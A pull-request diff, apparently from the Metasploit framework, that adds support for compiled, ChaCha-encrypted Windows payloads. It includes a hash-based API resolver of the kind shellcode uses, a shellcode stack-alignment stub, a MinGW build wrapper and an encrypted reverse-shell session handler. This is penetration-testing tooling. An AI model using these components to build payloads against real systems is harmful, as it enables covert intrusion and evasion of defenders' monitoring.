### PR TITLE
Backport for `Add compilable, encrypted payloads`

### DIFF
--- a/data/headers/windows/c_payload_util/chacha.h
+++ b/data/headers/windows/c_payload_util/chacha.h
@@ -1,0 +1,224 @@
+/*
+chacha-merged.c version 20080118
+D. J. Bernstein
+Public domain.
+*/
+
+/* $OpenBSD: chacha_private.h,v 1.2 2013/10/04 07:02:27 djm Exp $ */
+
+#include <stddef.h>
+
+typedef unsigned char u8;
+typedef unsigned int u32;
+
+typedef struct
+{
+  u32 input[16]; /* could be compressed */
+} chacha_ctx;
+
+#define U8C(v) (v##U)
+#define U32C(v) (v##U)
+
+#define U8V(v) ((u8)(v) & U8C(0xFF))
+#define U32V(v) ((u32)(v) & U32C(0xFFFFFFFF))
+
+#define ROTL32(v, n) \
+  (U32V((v) << (n)) | ((v) >> (32 - (n))))
+
+#define U8TO32_LITTLE(p) \
+  (((u32)((p)[0])      ) | \
+   ((u32)((p)[1]) <<  8) | \
+   ((u32)((p)[2]) << 16) | \
+   ((u32)((p)[3]) << 24))
+
+#define U32TO8_LITTLE(p, v) \
+  do { \
+    (p)[0] = U8V((v)      ); \
+    (p)[1] = U8V((v) >>  8); \
+    (p)[2] = U8V((v) >> 16); \
+    (p)[3] = U8V((v) >> 24); \
+  } while (0)
+
+#define ROTATE(v,c) (ROTL32(v,c))
+#define XOR(v,w) ((v) ^ (w))
+#define PLUS(v,w) (U32V((v) + (w)))
+#define PLUSONE(v) (PLUS((v),1))
+
+#define QUARTERROUND(a,b,c,d) \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a),16); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c),12); \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a), 8); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c), 7);
+
+static const char sigma[16] = "expand 32-byte k";
+static const char tau[16] = "expand 16-byte k";
+
+static void
+chacha_keysetup(chacha_ctx *x,const u8 *k,u32 kbits,u32 ivbits)
+{
+  const char *constants;
+
+  x->input[4] = U8TO32_LITTLE(k + 0);
+  x->input[5] = U8TO32_LITTLE(k + 4);
+  x->input[6] = U8TO32_LITTLE(k + 8);
+  x->input[7] = U8TO32_LITTLE(k + 12);
+  if (kbits == 256) { /* recommended */
+    k += 16;
+    constants = sigma;
+  } else { /* kbits == 128 */
+    constants = tau;
+  }
+  x->input[8] = U8TO32_LITTLE(k + 0);
+  x->input[9] = U8TO32_LITTLE(k + 4);
+  x->input[10] = U8TO32_LITTLE(k + 8);
+  x->input[11] = U8TO32_LITTLE(k + 12);
+  x->input[0] = U8TO32_LITTLE(constants + 0);
+  x->input[1] = U8TO32_LITTLE(constants + 4);
+  x->input[2] = U8TO32_LITTLE(constants + 8);
+  x->input[3] = U8TO32_LITTLE(constants + 12);
+}
+
+static void
+chacha_ivsetup(chacha_ctx *x,const u8 *iv)
+{
+  x->input[12] = 1;
+  x->input[13] = U8TO32_LITTLE(iv + 0);
+  x->input[14] = U8TO32_LITTLE(iv + 4);
+  x->input[15] = U8TO32_LITTLE(iv + 8);
+}
+
+static void
+chacha_encrypt_bytes(chacha_ctx *x,const u8 *m,u8 *c,u32 bytes)
+{
+  u32 x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15;
+  u32 j0, j1, j2, j3, j4, j5, j6, j7, j8, j9, j10, j11, j12, j13, j14, j15;
+  u8 *ctarget = NULL;
+  u8 tmp[64];
+  u32 i;
+
+  if (!bytes) return;
+
+  j0 = x->input[0];
+  j1 = x->input[1];
+  j2 = x->input[2];
+  j3 = x->input[3];
+  j4 = x->input[4];
+  j5 = x->input[5];
+  j6 = x->input[6];
+  j7 = x->input[7];
+  j8 = x->input[8];
+  j9 = x->input[9];
+  j10 = x->input[10];
+  j11 = x->input[11];
+  j12 = x->input[12];
+  j13 = x->input[13];
+  j14 = x->input[14];
+  j15 = x->input[15];
+
+  for (;;) {
+    if (bytes < 64) {
+      for (i = 0;i < bytes;++i) tmp[i] = m[i];
+      m = tmp;
+      ctarget = c;
+      c = tmp;
+    }
+    x0 = j0;
+    x1 = j1;
+    x2 = j2;
+    x3 = j3;
+    x4 = j4;
+    x5 = j5;
+    x6 = j6;
+    x7 = j7;
+    x8 = j8;
+    x9 = j9;
+    x10 = j10;
+    x11 = j11;
+    x12 = j12;
+    x13 = j13;
+    x14 = j14;
+    x15 = j15;
+    for (i = 20;i > 0;i -= 2) {
+      QUARTERROUND( x0, x4, x8,x12)
+      QUARTERROUND( x1, x5, x9,x13)
+      QUARTERROUND( x2, x6,x10,x14)
+      QUARTERROUND( x3, x7,x11,x15)
+      QUARTERROUND( x0, x5,x10,x15)
+      QUARTERROUND( x1, x6,x11,x12)
+      QUARTERROUND( x2, x7, x8,x13)
+      QUARTERROUND( x3, x4, x9,x14)
+    }
+    x0 = PLUS(x0,j0);
+    x1 = PLUS(x1,j1);
+    x2 = PLUS(x2,j2);
+    x3 = PLUS(x3,j3);
+    x4 = PLUS(x4,j4);
+    x5 = PLUS(x5,j5);
+    x6 = PLUS(x6,j6);
+    x7 = PLUS(x7,j7);
+    x8 = PLUS(x8,j8);
+    x9 = PLUS(x9,j9);
+    x10 = PLUS(x10,j10);
+    x11 = PLUS(x11,j11);
+    x12 = PLUS(x12,j12);
+    x13 = PLUS(x13,j13);
+    x14 = PLUS(x14,j14);
+    x15 = PLUS(x15,j15);
+
+#ifndef KEYSTREAM_ONLY
+    x0 = XOR(x0,U8TO32_LITTLE(m + 0));
+    x1 = XOR(x1,U8TO32_LITTLE(m + 4));
+    x2 = XOR(x2,U8TO32_LITTLE(m + 8));
+    x3 = XOR(x3,U8TO32_LITTLE(m + 12));
+    x4 = XOR(x4,U8TO32_LITTLE(m + 16));
+    x5 = XOR(x5,U8TO32_LITTLE(m + 20));
+    x6 = XOR(x6,U8TO32_LITTLE(m + 24));
+    x7 = XOR(x7,U8TO32_LITTLE(m + 28));
+    x8 = XOR(x8,U8TO32_LITTLE(m + 32));
+    x9 = XOR(x9,U8TO32_LITTLE(m + 36));
+    x10 = XOR(x10,U8TO32_LITTLE(m + 40));
+    x11 = XOR(x11,U8TO32_LITTLE(m + 44));
+    x12 = XOR(x12,U8TO32_LITTLE(m + 48));
+    x13 = XOR(x13,U8TO32_LITTLE(m + 52));
+    x14 = XOR(x14,U8TO32_LITTLE(m + 56));
+    x15 = XOR(x15,U8TO32_LITTLE(m + 60));
+#endif
+
+    j12 = PLUSONE(j12);
+    if (!j12) {
+      j13 = PLUSONE(j13);
+      /* stopping at 2^70 bytes per nonce is user's responsibility */
+    }
+
+    U32TO8_LITTLE(c + 0,x0);
+    U32TO8_LITTLE(c + 4,x1);
+    U32TO8_LITTLE(c + 8,x2);
+    U32TO8_LITTLE(c + 12,x3);
+    U32TO8_LITTLE(c + 16,x4);
+    U32TO8_LITTLE(c + 20,x5);
+    U32TO8_LITTLE(c + 24,x6);
+    U32TO8_LITTLE(c + 28,x7);
+    U32TO8_LITTLE(c + 32,x8);
+    U32TO8_LITTLE(c + 36,x9);
+    U32TO8_LITTLE(c + 40,x10);
+    U32TO8_LITTLE(c + 44,x11);
+    U32TO8_LITTLE(c + 48,x12);
+    U32TO8_LITTLE(c + 52,x13);
+    U32TO8_LITTLE(c + 56,x14);
+    U32TO8_LITTLE(c + 60,x15);
+
+    if (bytes <= 64) {
+      if (bytes < 64) {
+        for (i = 0;i < bytes;++i) ctarget[i] = c[i];
+      }
+      x->input[12] = j12;
+      x->input[13] = j13;
+      return;
+    }
+    bytes -= 64;
+    c += 64;
+#ifndef KEYSTREAM_ONLY
+    m += 64;
+#endif
+  }
+}

--- a/data/headers/windows/c_payload_util/kernel32_util.h
+++ b/data/headers/windows/c_payload_util/kernel32_util.h
@@ -1,0 +1,136 @@
+#ifndef _KERNEL_UTIL
+#define _KERNEL_UTIL
+
+typedef BOOL (WINAPI *FuncCreateProcess) (
+	LPCTSTR lpApplicationName,
+	LPTSTR lpCommandLine,
+	LPSECURITY_ATTRIBUTES lpProcessAttributes,
+	LPSECURITY_ATTRIBUTES lpThreadAttributes,
+	BOOL bInheritHandles,
+	DWORD dwCreationFlags,
+	LPVOID lpEnvironment,
+	LPCTSTR lpCurrentDirectory,
+	LPSTARTUPINFO lpStartupInfo,
+	LPPROCESS_INFORMATION lpProcessInformation
+);
+
+typedef BOOL (WINAPI *FuncSetHandleInformation)
+(
+  HANDLE hObject,
+  DWORD dwMask,
+  DWORD dwFlags
+);
+
+typedef BOOL (WINAPI *FuncReadFile)
+(
+  HANDLE hFile,
+  LPVOID lpBuffer,
+  DWORD nNumberOfBytesToRead,
+  LPDWORD lpNumberOfBytesToRead,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncWriteFile)
+(
+  HANDLE hFile,
+  LPCVOID lpBuffer,
+  DWORD nNumberOfBytesToWrite,
+  LPDWORD lpNumberOfBytesWritten,
+  LPOVERLAPPED lpOverlapped
+);
+
+typedef BOOL (WINAPI *FuncPeekNamedPipe)
+(
+  HANDLE hNamedPipe,
+  LPVOID lpBuffer,
+  DWORD nBufferSize,
+  LPDWORD nBytesRead,
+  LPDWORD lpTotalBytesAvailable,
+  LPDWORD lpBytesLeftThisMessage
+);
+
+typedef BOOL (WINAPI *FuncCreatePipe)
+(
+  PHANDLE hReadPipe,
+  PHANDLE hWritePipe,
+  LPSECURITY_ATTRIBUTES lpPipeAttributes,
+  DWORD nSize
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalAlloc)
+(
+  UINT uFlags,
+  SIZE_T dwBytes
+);
+
+typedef HGLOBAL (WINAPI *FuncGlobalFree)
+(
+  HGLOBAL hMem
+);
+
+typedef HANDLE (WINAPI *FuncHeapCreate)
+(
+  DWORD flOptions,
+  SIZE_T dwInitialize,
+  SIZE_T dwMaximumSize
+);
+
+typedef LPVOID (WINAPI *FuncHeapAlloc)
+(
+  HANDLE hHeap,
+  DWORD dwFlags,
+  SIZE_T dwBytes
+);
+
+typedef VOID (WINAPI *FuncSleep)
+(
+  DWORD dwMilliseconds
+);
+
+typedef HANDLE (WINAPI *FuncGetCurrentProcess) ();
+
+typedef BOOL (WINAPI *FuncGetExitCodeProcess)
+(
+  HANDLE hProcess,
+  LPDWORD lpExitCode
+);
+
+typedef VOID (WINAPI *FuncExitProcess)
+(
+  UINT uExitCode
+);
+
+typedef BOOL (WINAPI *FuncCloseHandle)
+(
+  HANDLE hObject
+);
+
+typedef BOOL (WINAPI *FuncVirtualProtect)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flNewProtect,
+  PDWORD lpflOldProtect
+);
+
+typedef LPVOID (WINAPI *FuncVirtualAlloc)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD flAllocationType,
+  DWORD flProtect
+);
+
+typedef BOOL (WINAPI *FuncVirtualFree)
+(
+  LPVOID lpAddress,
+  SIZE_T dwSize,
+  DWORD dwFreeType
+);
+
+#endif

--- a/data/headers/windows/c_payload_util/payload_util.h
+++ b/data/headers/windows/c_payload_util/payload_util.h
@@ -1,0 +1,152 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+#ifndef _PAYLOAD_UTIL
+#define _PAYLOAD_UTIL
+
+#include <windows.h>
+#include <winternl.h>
+
+typedef HMODULE (WINAPI *FuncLoadLibraryA) (
+	LPTSTR lpFileName
+);
+
+// This compiles to a ROR instruction
+// This is needed because _lrotr() is an external reference
+// Also, there is not a consistent compiler intrinsic to accomplish this across all three platforms.
+#define ROTR32(value, shift)	(((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
+
+// Redefine PEB structures. The structure definitions in winternl.h are incomplete.
+typedef struct _MY_PEB_LDR_DATA {
+  ULONG Length;
+	BOOL Initialized;
+	PVOID SsHandle;
+	LIST_ENTRY InLoadOrderModuleList;
+  LIST_ENTRY InMemoryOrderModuleList;
+	LIST_ENTRY InInitializationOrderModuleList;
+} MY_PEB_LDR_DATA, *PMY_PEB_LDR_DATA;
+
+typedef struct _MY_LDR_DATA_TABLE_ENTRY
+{
+	LIST_ENTRY InLoadOrderLinks;
+	LIST_ENTRY InMemoryOrderLinks;
+	LIST_ENTRY InInitializationOrderLinks;
+	PVOID DllBase;
+	PVOID EntryPoint;
+	ULONG SizeOfImage;
+	UNICODE_STRING FullDllName;
+	UNICODE_STRING BaseDllName;
+} MY_LDR_DATA_TABLE_ENTRY, *PMY_LDR_DATA_TABLE_ENTRY;
+
+HMODULE GetProcAddressWithHash( _In_ DWORD dwModuleFunctionHash )
+{
+	PPEB PebAddress;
+	PMY_PEB_LDR_DATA pLdr;
+	PMY_LDR_DATA_TABLE_ENTRY pDataTableEntry;
+	PVOID pModuleBase;
+	PIMAGE_NT_HEADERS pNTHeader;
+	DWORD dwExportDirRVA;
+	PIMAGE_EXPORT_DIRECTORY pExportDir;
+	PLIST_ENTRY pNextModule;
+	DWORD dwNumFunctions;
+	USHORT usOrdinalTableIndex;
+	PDWORD pdwFunctionNameBase;
+	PCSTR pFunctionName;
+	UNICODE_STRING BaseDllName;
+	DWORD dwModuleHash;
+	DWORD dwFunctionHash;
+	PCSTR pTempChar;
+	DWORD i;
+
+#if defined(_WIN64)
+	PebAddress = (PPEB) __readgsqword( 0x60 );
+#else
+	PebAddress = (PPEB) __readfsdword( 0x30 );
+#endif
+
+	pLdr = (PMY_PEB_LDR_DATA) PebAddress->Ldr;
+	pNextModule = pLdr->InLoadOrderModuleList.Flink;
+	pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pNextModule;
+
+	while (pDataTableEntry->DllBase != NULL)
+	{
+		dwModuleHash = 0;
+		pModuleBase = pDataTableEntry->DllBase;
+		BaseDllName = pDataTableEntry->BaseDllName;
+		pNTHeader = (PIMAGE_NT_HEADERS) ((ULONG_PTR) pModuleBase + ((PIMAGE_DOS_HEADER) pModuleBase)->e_lfanew);
+		dwExportDirRVA = pNTHeader->OptionalHeader.DataDirectory[0].VirtualAddress;
+
+		// Get the next loaded module entry
+		pDataTableEntry = (PMY_LDR_DATA_TABLE_ENTRY) pDataTableEntry->InLoadOrderLinks.Flink;
+
+		// If the current module does not export any functions, move on to the next module.
+		if (dwExportDirRVA == 0)
+		{
+			continue;
+		}
+
+		// Calculate the module hash
+		for (i = 0; i < BaseDllName.MaximumLength; i++)
+		{
+			pTempChar = ((PCSTR) BaseDllName.Buffer + i);
+
+			dwModuleHash = ROTR32( dwModuleHash, 13 );
+
+			if ( *pTempChar >= 0x61 )
+			{
+				dwModuleHash += *pTempChar - 0x20;
+			}
+			else
+			{
+				dwModuleHash += *pTempChar;
+			}
+		}
+
+		pExportDir = (PIMAGE_EXPORT_DIRECTORY) ((ULONG_PTR) pModuleBase + dwExportDirRVA);
+
+		dwNumFunctions = pExportDir->NumberOfNames;
+		pdwFunctionNameBase = (PDWORD) ((PCHAR) pModuleBase + pExportDir->AddressOfNames);
+
+		for (i = 0; i < dwNumFunctions; i++)
+		{
+			dwFunctionHash = 0;
+			pFunctionName = (PCSTR) (*pdwFunctionNameBase + (ULONG_PTR) pModuleBase);
+			pdwFunctionNameBase++;
+
+			pTempChar = pFunctionName;
+
+			do
+			{
+				dwFunctionHash = ROTR32( dwFunctionHash, 13 );
+				dwFunctionHash += *pTempChar;
+				pTempChar++;
+			} while (*(pTempChar - 1) != 0);
+
+			dwFunctionHash += dwModuleHash;
+
+			if (dwFunctionHash == dwModuleFunctionHash)
+			{
+				usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
+				return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
+			}
+		}
+	}
+
+	// All modules have been exhausted and the function was not found.
+	return NULL;
+}
+
+#endif

--- a/data/headers/windows/c_payload_util/winsock_util.h
+++ b/data/headers/windows/c_payload_util/winsock_util.h
@@ -1,0 +1,64 @@
+#ifndef _WINSOCK_UTIL
+#define _WINSOCK_UTIL
+
+#define WIN32_LEAN_AND_MEAN
+
+#include <windows.h>
+#include <winsock2.h>
+#include <intrin.h>
+#include <ws2tcpip.h>
+
+typedef int (WINAPI *FuncWSAStartup)
+(
+  WORD wVersionRequired,
+  LPWSADATA lpWSAData
+);
+
+typedef int (WINAPI *FuncWSACleanup) ();
+
+typedef int (WINAPI *FuncGetAddrInfo)
+(
+  PCSTR pNodeName,
+  PCSTR pServiceName,
+  const ADDRINFO *pHints,
+  LPADDRINFO *ppResult
+);
+
+typedef void (WINAPI *FuncFreeAddrInfo)
+(
+  LPADDRINFO pAddrInfo
+);
+
+typedef SOCKET (WINAPI *FuncWSASocketA) (
+	int af,
+	int type,
+	int protocol,
+	LPWSAPROTOCOL_INFO lpProtocolInfo,
+	GROUP g,
+	DWORD dwFlags
+);
+
+typedef int (WINAPI *FuncConnect)
+(
+  SOCKET s,
+  const struct sockaddr *name,
+  int namelen
+);
+
+typedef int (WINAPI *FuncSend)
+(
+  SOCKET s,
+  const char *buf,
+  int len,
+  int flags
+);
+
+typedef int (WINAPI *FuncRecv)
+(
+  SOCKET s,
+  char *buf,
+  int len,
+  int flags
+);
+
+#endif

--- a/data/utilities/encrypted_payload/AdjustStack.asm
+++ b/data/utilities/encrypted_payload/AdjustStack.asm
@@ -1,0 +1,48 @@
+/*
+ * This code is provided under the 3-clause BSD license below.
+ * ***********************************************************
+ *
+ * Copyright (c) 2013, Matthew Graeber
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
+ *
+ *   Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
+ *   Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
+ *   The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+; Author:       Matthew Graeber (@mattifestation)
+; License:      BSD 3-Clause
+; Syntax:       MASM
+; Build Syntax: ml64 /c /Cx AdjustStack.asm
+; Output:       AdjustStack.obj
+; Notes: I really wanted to avoid having this external dependency but I couldnt
+; come up with any other way to guarantee 16-byte stack alignment in 64-bit
+; shellcode written in C.
+
+extern	ExecutePayload
+global  AlignRSP			; Marking AlignRSP as PUBLIC allows for the function
+							; to be called as an extern in our C code.
+
+segment .text
+
+; AlignRSP is a simple call stub that ensures that the stack is 16-byte aligned prior
+; to calling the entry point of the payload. This is necessary because 64-bit functions
+; in Windows assume that they were called with 16-byte stack alignment. When amd64
+; shellcode is executed, you cant be assured that you stack is 16-byte aligned. For example,
+; if your shellcode lands with 8-byte stack alignment, any call to a Win32 function will likely
+; crash upon calling any ASM instruction that utilizes XMM registers (which require 16-byte)
+; alignment.
+
+AlignRSP:
+	push	rsi						; Preserve RSI since were stomping on it
+	mov		rsi, rsp				; Save the value of RSP so it can be restored
+	and		rsp, 0FFFFFFFFFFFFFFF0h	; Align RSP to 16 bytes
+	sub		rsp, 020h				; Allocate homing space for ExecutePayload
+	call	ExecutePayload			; Call the entry point of the payload
+	mov		rsp, rsi				; Restore the original value of RSP
+	pop		rsi						; Restore RSI
+	ret								; Return to caller

--- a/data/utilities/encrypted_payload/func_order.ld
+++ b/data/utilities/encrypted_payload/func_order.ld
@@ -1,0 +1,9 @@
+ENTRY(_ExecutePayload)
+SECTIONS
+{
+	.text :
+	{
+		*(.text.ExecutePayload)
+	}
+
+}

--- a/data/utilities/encrypted_payload/func_order64.ld
+++ b/data/utilities/encrypted_payload/func_order64.ld
@@ -1,0 +1,11 @@
+ENTRY(AlignRSP)
+SECTIONS
+{
+	.text :
+	{
+    *(.text.AlignRSP)
+		*(.text.ExecutePayload)
+		*(.text.GetProcAddressWithHash)
+	}
+
+}

--- a/lib/metasploit/framework/compiler/mingw.rb
+++ b/lib/metasploit/framework/compiler/mingw.rb
@@ -1,0 +1,123 @@
+require 'msf/util/helper'
+require 'open3'
+
+module Metasploit
+  module Framework
+    module Compiler
+      module Mingw
+        MINGW_X86 = 'i686-w64-mingw32-gcc'
+        MINGW_X64 = 'x86_64-w64-mingw32-gcc'
+
+        INCLUDE_DIR = File.join(Msf::Config.install_root, 'data', 'headers', 'windows', 'c_payload_util')
+        UTILITY_DIR = File.join(Msf::Config.install_root, 'data', 'utilities', 'encrypted_payload')
+
+        def compile_c(src)
+          cmd = build_cmd(src)
+
+          stdin_err, status = Open3.capture2e(cmd)
+          stdin_err
+        end
+
+        def build_cmd(src)
+          cmd = ''
+          link_options = '-Wl,'
+
+          src_file = File.basename(self.file_name, '.exe')
+          path = File.join(Msf::Config.install_root, "#{src_file}.c")
+          File.write(path, src)
+
+          opt_level = [ 'Os', 'O0', 'O1', 'O2', 'O3', 'Og' ].include?(self.opt_lvl) ? "-#{self.opt_lvl} " : "-O2 "
+
+          cmd << "#{self.mingw_bin} "
+          cmd << "#{path} -I #{INCLUDE_DIR} "
+          cmd << "-o #{Msf::Config.install_root}/#{self.file_name} "
+
+          # gives each function its own section
+          # allowing them to be reordered
+          cmd << '-ffunction-sections '
+          cmd << '-fno-asynchronous-unwind-tables '
+          cmd << '-nostdlib '
+          cmd << '-fno-ident '
+          cmd << opt_level
+
+          link_options << '--no-seh,'
+          link_options << '-s,' if self.strip_syms
+          link_options << "-T#{self.link_script}" if self.link_script
+
+          cmd << link_options
+
+          cmd
+        end
+
+        def cleanup_files
+          file_base = File.basename(self.file_name, '.exe')
+          src_file = "#{file_base}.c"
+          exe_file = "#{file_base}.exe"
+          file_path = Msf::Config.install_root
+
+          unless self.keep_src
+            File.delete("#{file_path}/#{src_file}") if File.exist?("#{file_path}/#{src_file}")
+          end
+
+          unless self.keep_exe
+            File.delete("#{file_path}/#{exe_file}") if File.exist?("#{file_path}/#{exe_file}")
+          end
+        rescue Errno::ENOENT
+          print_error("Failed to delete file")
+        end
+
+        class X86
+          include Mingw
+
+          attr_reader :file_name, :keep_exe, :keep_src, :strip_syms, :link_script, :opt_lvl, :mingw_bin
+
+          def initialize(opts={})
+            @file_name = opts[:f_name]
+            @keep_exe = opts[:keep_exe]
+            @keep_src = opts[:keep_src]
+            @strip_syms = opts[:strip_symbols]
+            @link_script = opts[:linker_script]
+            @opt_lvl = opts[:opt_lvl]
+            @mingw_bin = MINGW_X86
+          end
+
+          def self.available?
+            !!(Msf::Util::Helper.which(MINGW_X86))
+          end
+        end
+
+        class X64
+          include Mingw
+
+          attr_reader :file_name, :keep_exe, :keep_src, :strip_syms, :link_script, :opt_lvl, :mingw_bin
+
+          def initialize(opts={})
+            @file_name = opts[:f_name]
+            @keep_exe = opts[:keep_exe]
+            @keep_src = opts[:keep_src]
+            @strip_syms = opts[:strip_symbols]
+            @link_script = opts[:linker_script]
+            @opt_lvl = opts[:opt_lvl]
+            @mingw_bin = MINGW_X64
+          end
+
+          def self.available?
+            !!(Msf::Util::Helper.which(MINGW_X64))
+          end
+        end
+
+        class UncompilablePayloadError < StandardError
+          def initialize(msg='')
+            super(msg)
+          end
+        end
+
+        class CompiledPayloadNotFoundError < StandardError
+          def initialize(msg='Compiled executable not found')
+            super(msg)
+          end
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/base/sessions/encrypted_shell.rb
+++ b/lib/msf/base/sessions/encrypted_shell.rb
@@ -1,0 +1,111 @@
+# -*- coding: binary -*-
+require 'msf/base'
+require 'securerandom'
+require 'msf/core/payload/windows/payload_db_conf'
+
+module Msf
+module Sessions
+
+class EncryptedShell < Msf::Sessions::CommandShell
+
+  include Msf::Session::Basic
+  include Msf::Session::Provider::SingleCommandShell
+  include Msf::Payload::Windows::PayloadDBConf
+
+  attr_accessor :arch
+  attr_accessor :platform
+
+  attr_accessor :iv
+  attr_accessor :key
+  attr_accessor :staged
+
+  attr_accessor :chacha_cipher
+
+  # define some sort of method that checks for
+  # the existence of payload in the db before
+  # using datastore
+  def initialize(rstream, opts={})
+    self.arch ||= ""
+    self.platform = "windows"
+    @staged = opts[:datastore][:staged]
+    super
+  end
+
+  def type
+    "Encrypted"
+  end
+
+  def desc
+    "Encrypted reverse shell"
+  end
+
+  def self.type
+    self.class.type = "Encrypted"
+  end
+
+  def process_autoruns(datastore)
+    @key = datastore[:key] || datastore['ChachaKey']
+    nonce = datastore[:nonce] || datastore['ChachaNonce']
+    @iv = nonce
+
+    # staged payloads retrieve UUID via
+    # handle_connection() in stager.rb
+    unless @staged
+      curr_uuid = rstream.get_once(16, 1)
+      @key, @nonce = retrieve_chacha_creds(curr_uuid)
+      @iv = @nonce ? @nonce : "\0" * 12
+
+      unless @key && @nonce
+        print_status('Failed to retrieve key/nonce for uuid. Resorting to datastore')
+        @key = datastore['ChachaKey']
+        @iv = datastore['ChachaNonce']
+      end
+    end
+
+    new_nonce = SecureRandom.hex(6)
+    new_key = SecureRandom.hex(16)
+
+    @chacha_cipher = Rex::Crypto::Chacha20.new(@key, @iv)
+    new_cipher = @chacha_cipher.chacha20_crypt(new_nonce + new_key)
+    rstream.write(new_cipher)
+
+    @key = new_key
+    @iv = new_nonce
+    @chacha_cipher.reset_cipher(@key, @iv)
+  end
+
+  ##
+  # Overridden from Msf::Sessions::CommandShell#shell_read
+  #
+  # Read encrypted data from console and decrypt it
+  #
+  def shell_read(length=-1, timeout=1)
+    rv = rstream.get_once(length, timeout)
+    decrypted = @chacha_cipher.chacha20_crypt(rv)
+    framework.events.on_session_output(self, decrypted) if decrypted
+
+    return decrypted
+  rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE => e
+    shell_close
+    raise e
+  end
+
+  ##
+  # Overridden from Msf::Sessions::CommandShell#shell_write
+  #
+  # Encrypt data then write it to the console
+  #
+  def shell_write(buf)
+    return unless buf
+
+    framework.events.on_session_command(self, buf.strip)
+    encrypted = @chacha_cipher.chacha20_crypt(buf)
+    rstream.write(encrypted)
+  rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE => e
+    shell_close
+    raise e
+  end
+
+end
+end
+end

--- a/lib/msf/core/framework.rb
+++ b/lib/msf/core/framework.rb
@@ -199,6 +199,12 @@ class Framework
   #
   attr_reader   :analyze
 
+  #
+  # The framework instance's dependency
+  #
+  #
+  attr_accessor   :has_mingw
+
   # The framework instance's db manager. The db manager
   # maintains the database db and handles db events
   #

--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -32,6 +32,7 @@ class Payload < Msf::Module
   require 'msf/core/payload/firefox'
   require 'msf/core/payload/mainframe'
   require 'msf/core/payload/hardware'
+  require 'metasploit/framework/compiler/mingw'
 
   # Universal payload includes
   require 'msf/core/payload/multi'
@@ -68,6 +69,12 @@ class Payload < Msf::Module
   #
   def initialize(info = {})
     super
+
+    #
+    # Gets the Dependencies if the payload requires external help
+    # to work
+    #
+    self.module_info['Dependencies'] = self.module_info['Dependencies'] || []
 
     # If this is a staged payload but there is no stage information,
     # then this is actually a stager + single combination.  Set up the
@@ -202,7 +209,7 @@ class Payload < Msf::Module
     pl = nil
     begin
       pl = generate()
